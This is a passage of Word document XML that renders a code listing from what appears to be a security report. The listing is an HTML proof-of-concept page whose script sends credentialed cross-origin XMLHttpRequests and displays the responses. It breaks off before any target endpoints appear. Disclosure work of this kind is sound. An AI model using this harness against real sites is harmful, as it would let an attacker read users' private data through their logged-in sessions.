    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(poc,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>url, poc_id, method = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'GET'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, body = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="791"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>document.body.innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'&lt;b&gt;PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>':</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'&lt;/b&gt;&lt;p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>poc_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'&gt;&lt;/p&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xhttp = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="4309" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xhttp.onreadystatechange</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.status == 200) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>document.getElementById(poc_id).innerText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xhttp.responseText;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1511" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xhttp.open(method,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>url,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>); xhttp.withCredentials = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1511" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'GET'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xhttp.send(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//post</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xhttp.setRequestHeader(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>type'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'application/json;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>charset=utf-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>endpoint = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto" w:before="63"/>
        <w:rPr>
